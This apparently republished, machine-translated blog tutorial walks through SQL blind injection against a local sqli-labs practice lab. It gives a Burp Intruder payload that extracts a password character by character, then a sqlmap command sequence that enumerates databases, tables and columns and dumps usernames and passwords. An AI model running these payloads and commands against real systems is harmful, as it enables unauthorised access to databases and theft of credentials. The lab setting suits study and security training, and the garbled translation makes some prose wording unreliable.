当前位置:网站首页>[tools run SQL blind note]

[tools run SQL blind note]

2022-07-03 04:38:00 Black zone (rise)

Catalog

One 、( Tools )burp Running blind injection

1.1、 Method 1 : Blast

1.2、 Method 2 : Injection statement explosion

Two 、( Tools )sqlmap Run Boolean blind injection

2.1、 command :

2.2、 Use process :

First step : Detect whether there is injection

  The second step : Burst database name

  The third step : Burst database table name

  Step four : Pop field name

  Step five : Burst data

  3、 ... and 、 recommend

One 、( Tools )burp Running blind injection

1.1、 Method 1 : Blast

After grabbing the bag , Send the request to "Intruder" modular

Set up 2 Payloads

 

1.2、 Method 2 : Injection statement explosion

Inject construct statements , Iterate

(select case when '§0§' = lower(substring((select password from employees where empid=1),§1§,1)) then 1 else 0 end)

Two 、( Tools )sqlmap Run Boolean blind injection

2.1、 command :

-u Specify injection point

--dbs Run to the library name

--tables Running Watch name

--columns Run field name

--dump Enumerating data

Run out of the corresponding rear , Add... In turn -D Specify the library -T Designated table -C Specified field

2.2、 Use process :

First step : Detect whether there is injection

Basic operation

python sqlmap.py http://localhost:8080/sqli-labs-master/Less-5/?id=1 --batch

--batch Is to use the default settings

In fact, the environment has been swept out  

You can add --dbms mysql 了

  The second step : Burst database name

command

# Get all databases

sqlmap.py -u url --dbs --batch

---------

# Get the current database

sqlmap.py -u url --current-dbs --batch

Basic operation

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' --dbs --batch

 

  The third step : Burst database table name

command

python sqlmap.py -u url -D DB --tables --batch

Basic operation

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security --tables --batch

 

  Step four : Pop field name

command :

sqlmap.py -u url -D DB -T TBL --columns --batch

Basic operation

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users --columns --batch

  Step five : Burst data

command :

sqlmap.py -u url -D DB -T TBL -C "COL1,COL2" --dump --batch

Basic operation :

python sqlmap.py -u 'http://localhost:8080/sqli-labs-master/Less-5/?id=1' -D security -T users -C "username,password" --dump --batch

 

  3、 ... and 、 recommend

【SQL Inject - No echo 】 Bull's blind note : principle 、 function 、 Use process

【SQL Inject - With echo 】DNS Request injection : principle 、 platform 、 Using process 、 To configure

原网站

版权声明
本文为[Black zone (rise)]所创,转载请带上原文链接,感谢
https://yzsam.com/2022/184/202207030433113020.html

边栏推荐

猜你喜欢

随机推荐